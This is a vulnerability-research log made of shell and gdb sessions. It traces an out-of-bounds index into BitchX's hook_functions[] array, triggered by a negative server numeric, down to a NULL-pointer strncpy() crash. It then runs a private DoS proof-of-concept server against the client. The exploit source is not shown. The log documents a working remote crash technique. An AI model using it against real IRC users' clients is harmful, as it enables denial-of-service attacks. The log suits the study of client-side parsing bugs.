nitrous@lsd:~/vulndev/biatch$ gcc poc-stacked.c -o poc-stacked
poc-stacked.c: En la función ‘main’:
poc-stacked.c:82: aviso: el puntero que apunta en el paso del argumento 3 de ‘accept’ difiere en signo
nitrous@lsd:~/vulndev/biatch$ ./poc-stacked &
[2] 7303
nitrous@lsd:~/vulndev/biatch$ BitchX (epic) =<1.1-final remote PoC
====================================
Listening on port 6667
nitrous@lsd:~/vulndev/biatch/BitchX/source$ gdb -q ./BitchX
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r foo localhost
Starting program: /home/nitrous/vulndev/biatch/BitchX/source/BitchX foo localhost
BitchX - Based on EPIC Software Labs epic ircII (1998).
Version (BitchX-1.1-final) -- Date (20040326).
Process [7325]
Using terminal type [xterm]
                                                                   ,
                                           .                     ,$
                 .                                              ,$'
                                           .        .          ,$'
                 :      ,g$p,              .         $,       ,$'
               y&$       `"` .,.           $&y       `$,     ,$'
               $$$     o oooy$$$yoo o      $$$        `$,   ,$' -acidjazz
         .     $$$%yyyp, gyp`$$$'gyyyyyyp, $$$yyyyp,   `$, ,$'     .
       . yxxxx $$$"`"$$$ $$$ $$$ $y$"`"$$$ $$$"`"$$$ xxx`$,$'xxxxxxy .
         $     $$7   l$$ $$$ $$$ $$7   """ $$7   ly$     .$'       $
         $     $$b   dy$ $$$ $y$ $$b   $$$ $$b   d$$    ,$`$,      $
       . $xxxx $$$uuu$$$ $$$ $$$ $$$uuu$$$ $$$   $$$ x ,$'x`$, xxxx$ .
         .           """ """ """       """       """  ,$'   `$,    .
           b i t c h    -      x                     ,$'     `$,
                                                     $'       `$,
                                                    '          `$,
                                                                `$,
                                                                 `$
                                                                   `
-:- BitchX: Auto Response is set to - foo
-:- Connecting to port 6667 of server localhost [refnum 0]

 [10:30am][<Nickname not registered yet>] []
 [Lag ??]                                                                                                            [::::]
[0]
Program received signal SIGSEGV, Segmentation fault.
0x080c8cf4 in BX_do_hook (which=9999999, format=0x81749e8 "%s %s") at hook.c:865
865                     if (hook_functions[which].mark &&
(gdb) bt
#0  0x080c8cf4 in BX_do_hook (which=9999999, format=0x81749e8 "%s %s") at hook.c:865
#1  0x08109bcc in numbered_command (from=0xbfb43b38 'A' <repeats 200 times>, comm=-9999999, ArgList=0xbfb43280)
    at numbers.c:1413
#2  0x081117f1 in parse_server (orig_line=0xbfb43b37 ":", 'A' <repeats 199 times>...) at parse.c:1912
#3  0x0811aa79 in do_server (rd=0xbfb44420, wr=0xbfb443a0) at server.c:584
#4  0x080d9a9a in BX_io (what=0x816f0b0 "main") at ./irc.c:1319
#5  0x080da458 in main (argc=3, argv=0xbfb44614, envp=0xbfb44624) at ./irc.c:1687
(gdb) p &hook_functions[0]
$1 = (HookFunc *) 0x818aac0
(gdb) p which
$2 = 9999999
(gdb) p &hook_functions[which]
$3 = (HookFunc *) 0x14046cac
(gdb) p hook_functions[which]
Cannot access memory at address 0x14046cac
(gdb) q







<<<=================================================================>>>
MY WORK: DoS BitchX! passing through some if statements (there is no bounds check on
         the numeric index into the 157-entry hook_functions[] array) and finally
         breaking strncpy() with a (char *) 0x00 pointer as source.
<<<=================================================================>>>
nitrous@lsd:~/vulndev/biatch/BitchX/source$ gdb -q ./BitchX
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) b numbered_command
Breakpoint 1 at 0x8106583: file numbers.c, line 519.
(gdb) r foo localhost
Starting program: /home/nitrous/vulndev/biatch/BitchX/source/BitchX foo localhost
BitchX - Based on EPIC Software Labs epic ircII (1998).
Version (BitchX-1.1-final) -- Date (20040326).
Process [7332]
Using terminal type [xterm]
                                                                   ,
                                           .                     ,$
                 .                                              ,$'
                                           .        .          ,$'
                 :      ,g$p,              .         $,       ,$'
               y&$       `"` .,.           $&y       `$,     ,$'
               $$$     o oooy$$$yoo o      $$$        `$,   ,$' -acidjazz
         .     $$$%yyyp, gyp`$$$'gyyyyyyp, $$$yyyyp,   `$, ,$'     .
       . yxxxx $$$"`"$$$ $$$ $$$ $y$"`"$$$ $$$"`"$$$ xxx`$,$'xxxxxxy .
         $     $$7   l$$ $$$ $$$ $$7   """ $$7   ly$     .$'       $
         $     $$b   dy$ $$$ $y$ $$b   $$$ $$b   d$$    ,$`$,      $
       . $xxxx $$$uuu$$$ $$$ $$$ $$$uuu$$$ $$$   $$$ x ,$'x`$, xxxx$ .
         .           """ """ """       """       """  ,$'   `$,    .
           b i t c h    -      x                     ,$'     `$,
                                                     $'       `$,
                                                    '          `$,
                                                                `$,
                                                                 `$
                                                                   `
-:- BitchX: Auto Response is set to - foo
-:- Connecting to port 6667 of server localhost [refnum 0]

 [10:39am][<Nickname not registered yet>] []
 [Lag ??]                                                                                                            [::::]
[0]
Breakpoint 1, numbered_command (from=0xbfe74c88 'A' <repeats 200 times>, comm=-9999999, ArgList=0xbfe743cc)
    at numbers.c:519
519             char    none_of_these = 0;
(gdb) n
521             int     old_current_numeric = current_numeric;
(gdb)
522             AJoinList *tmp = NULL;
(gdb)
525             if (!ArgList[1] || !from || !*from)
(gdb)
528             user = (*ArgList[0]) ? ArgList[0] : NULL;
(gdb)
530             reset_display_target();
(gdb)
532             ArgList++;
(gdb)
533             current_numeric = -comm;        /* must be negative of numeric! */
(gdb)
535             switch (comm)
/*** AT THIS POINT, WE CAN BYPASS THE switch() STATEMENT  ***/
/*** AUTOMATICALLY TO DEFAULT (negative number).          ***/
(gdb) p comm
$1 = -9999999
(gdb) p current_numeric
$2 = 9999999
(gdb) n				/*** BEGINS THE 'default:' SECTION ***/
1391                            char    *ArgSpace = NULL;
(gdb)
1396                            for (i = len = 0; ArgList[i]; len += strlen(ArgList[i++]))
(gdb)
1398                            len += (i - 1);
(gdb)
1399                            ArgSpace = alloca(len + 1);
(gdb)
1400                            ArgSpace[0] = '\0';
(gdb)
1403                            if (ArgList[0] && is_channel(ArgList[0]))
(gdb)
1406                            for (i = 0; ArgList[i]; i++)
(gdb)
1408                                    if (i)
(gdb)
1410                                    strcat(ArgSpace, ArgList[i]);
(gdb)
1406                            for (i = 0; ArgList[i]; i++)
(gdb)
1413                            if (!do_hook(current_numeric, "%s %s", from, ArgSpace))
(gdb) b BX_do_hook
Breakpoint 2 at 0x80c8c49: file hook.c, line 824.
(gdb) n

Breakpoint 2, BX_do_hook (which=9999999, format=0x81749e8 "%s %s") at hook.c:824
824             Hook            *tmp = NULL,
(gdb) n
825                             *next = NULL,
(gdb)
828                             *name           = NULL;
(gdb)
829             int             retval          = DONT_SUPPRESS_DEFAULT;
(gdb)
830             unsigned        display         = window_display;
(gdb)
832             Hook            *hook_array     [2048] = { 0 };
(gdb)
833             int             hook_num = 0;
(gdb)
834             char            *result = NULL;
(gdb)
835             int             old_debug_count = debug_count;
/*** THIS IS A CHUNK OF THE CORRESPONDING C CODE FOR THE NEXT GDB STEPS... ***/
from hook.c:
<...snip...>
#define HF_NORECURSE    0x0001  /* HookFunc.flags bit: a hook type already marked as executing gets list = NULL instead of being entered again */
<...snip...>
        /* Numeric list */
        if (which < 0)
        {
                NumericList *hook;

                if ((hook = find_numeric_list(-which)))
                {
                        name = hook->name;
                        list = &hook->list;
                }
                else
                        list = NULL;
        }

        /* Named list */
        else
        {
                /*
                 * If we're already executing the type, and we're
                 * specifically not supposed to allow recursion, then
                 * dont allow recursion. ;-)
                 */
                if (hook_functions[which].mark &&
                    (hook_functions[which].flags & HF_NORECURSE))
                        list = NULL;
                else
                {
                        list = &(hook_functions[which].list);
                        name = hook_functions[which].name;
                        strncpy(hook_name, hook_functions[which].name, BIG_BUFFER_SIZE);
                }
        }
<...snip...>
/*** END OF RELATED C CODE ***/
(gdb)
844             if (which < 0)
(gdb) p which
$1 = 9999999
(gdb) n		/*** 'else' SECTION ***/
865                     if (hook_functions[which].mark && (hook_functions[which].flags & HF_NORECURSE)
/*** SO, WE NEED TO BYPASS THIS if(), BUT WE NEED TO CHANGE THE 'which' VALUE (9999999) AND   ***/
/*** PASS THE '&' OPERATION WITH 'HF_NORECURSE', LET'S DO IT:                                 ***/
(gdb) whatis hook_functions
type = HookFunc [157]	/*** IT HOLDS 157 HookFunc VARIABLES (0 - 156) ***/
(gdb) p hook_functions[0]
$2 = {name = 0x816a8e2 "ACTION", list = 0x0, params = 3, mark = 0, flags = 0}
(gdb) p hook_functions[156]
$3 = {name = 0x816af75 "YELL", list = 0x0, params = 1, mark = 0, flags = 0}
(gdb) p &hook_functions[156]
$5 = (HookFunc *) 0x818b6f0
(gdb) p hook_functions[156].mark
$6 = 0
(gdb) p hook_functions[156].flags
$7 = 0
(gdb) p hook_functions[156].name
$8 = 0x816af75 "YELL"
(gdb) p &hook_functions[156]
$9 = (HookFunc *) 0x818b6f0
(gdb) x/10s &hook_functions[158]
0x818b718 <hook_functions+3160>:         ""
0x818b719 <hook_functions+3161>:         ""
0x818b71a <hook_functions+3162>:         ""
0x818b71b <hook_functions+3163>:         ""
0x818b71c <hook_functions+3164>:         ""
0x818b71d <hook_functions+3165>:         ""
0x818b71e <hook_functions+3166>:         ""
0x818b71f <hook_functions+3167>:         ""
0x818b720 <cvsrevision>:         "$Id: if.c,v 1.1.1.1 2003/04/11 01:09:07 dan Exp $"
0x818b752 <cvsrevision+50>:      ""
(gdb) x/s &hook_functions[159].name
0x818b72c <cvsrevision+12>:      "1.1.1.1 2003/04/11 01:09:07 dan Exp $"
(gdb) x/s &hook_functions[165].name
0x818b7a4 <cvsrevision+4>:       " input.c,v 1.1.1.1 2003/04/11 01:09:07 dan Exp $"
(gdb) x/s &hook_functions[171].name
0x818b81c <name_type+28>:        "\003"
(gdb) x/s &hook_functions[185].name
0x818b934 <version>:     "BitchX"
(gdb) x/s &hook_functions[261].name
0x818bf24 <levels+100>:  ")"
/*** SO, WE CAN TAKE WHATEVER WE WANT FROM 0x818b6f0 ONWARDS. BUT, REMEMBER,                 ***/
/*** WE NEED TO PASS THE if() WITH 'hook_functions[which].flags & 1' AND THEN JUST GIVE      ***/
/*** AN INVALID POINTER TO strncpy() (hook_functions[which].name). HEY, BUT REMEMBER THAT    ***/
/*** THE LAST ENTRY OF THE 'hook_functions' ARRAY IS NULL ;)...                              ***/
(gdb) p hook_functions[157]
$12 = {name = 0x0, list = 0x0, params = 0, mark = 0, flags = 0}
(gdb) whatis hook_functions[157].name
type = char *
(gdb) set which=157
(gdb) n		/*** COOL, 'if()' PASSED. THIS IS THE 'else' PART ***/
870                             list = &(hook_functions[which].list);
(gdb) n
871                             name = hook_functions[which].name;
(gdb) n
872                             strncpy(hook_name, hook_functions[which].name, BIG_BUFFER_SIZE);
(gdb) x/x &hook_functions[which].name
0x818b704 <hook_functions+3140>:        0x00000000
(gdb) whatis hook_name
type = char [2049]
(gdb) n

Program received signal SIGSEGV, Segmentation fault.
0xb7e2f410 in strncpy () from /lib/tls/i686/cmov/libc.so.6
(gdb) bt
#0  0xb7ea4410 in strncpy () from /lib/tls/i686/cmov/libc.so.6
#1  0x080c8d78 in BX_do_hook (which=157, format=0x81749e8 "%s %s") at hook.c:872
#2  0x08109bcc in numbered_command (from=0xbfce9c68 "FOOBAR", comm=-157, ArgList=0xbfce93b0) at numbers.c:1413
#3  0x081117f1 in parse_server (orig_line=0xbfce9c67 ":FOOBAR") at parse.c:1912
#4  0x0811aa79 in do_server (rd=0xbfcea550, wr=0xbfcea4d0) at server.c:584
#5  0x080d9a9a in BX_io (what=0x816f0b0 "main") at ./irc.c:1319
#6  0x080da458 in main (argc=3, argv=0xbfcea744, envp=0xbfcea754) at ./irc.c:1687
(gdb) x/i $eip
0xb7e2f410 <strncpy+48>:        movzbl (%ecx),%eax
(gdb) i r eax ecx
eax            0x81a0360        135922528
ecx            0x0      0	/*** NULL POINTER ***/
(gdb) q
The program is running.  Exit anyway? (y or n) y
nitrous@lsd:~/vulndev/biatch$ head -12 biatch-xxx.c
/*
 ** PRIVATE ****** PRIVATE ******* PRIVATE ******* PRIVATE *
 *                                                         *
 * BitchX =< 1.1-final DoS (SIGSEGV) [Integer overflow]    *
 * [strncpy() approach]                                    *
 * nitr0us <nitrousenador[@]gmail[.]com]>                  *
 *                                                         *
 ** PRIVATE ****** PRIVATE ******* PRIVATE ******* PRIVATE *
 *
 * Special Tnx to Federico L. Bossi (pelotudo de m!3%d@)
 *
 * Read biatch-x.log for details.
nitrous@lsd:~/vulndev/biatch$ ./biatch-xxx
###################################################
###          BitchX =< 1.1-final DoS            ###
###           [ strncpy() approach]             ###
###------=] PRIVATE - PRIVATE - PRIVATE - [=-----##
###### nitr0us <nitrousenador[@]gmail[.]com> ######

Client @ 127.0.0.1
Sent 22 bytes

.....
nitrous@lsd:~/vulndev/biatch/BitchX/source$ bitchx
BitchX - Based on EPIC Software Labs epic ircII (1998).
Version (BitchX-1.1-final) -- Date (20040326).
Process [7366]
Using terminal type [xterm]

        ________            ________         ________         ________
        \      //___________\      /________\\      /_________\_     //
      ___\    ___   _________     __     _______         \     /    /
        <<_____     \      /      >     \     /____\     >>        \ ___
      ____    /______\_____<<_____//___________>>  /_______\   /_____>>sm
        <<___________          bitchx by panasync        /______\\   ____
                    /------------------------------------------------\\
-:- BitchX: Auto Response is set to - nitrous
-:- Connecting to port 6667 of server localhost [refnum 1]

 [11:17am][<Nickname not registered yet>] []
 [0] /server localhost 6667
 [Lag ??]                                                                                                            [::::]
 [0] Violación de segmento
$
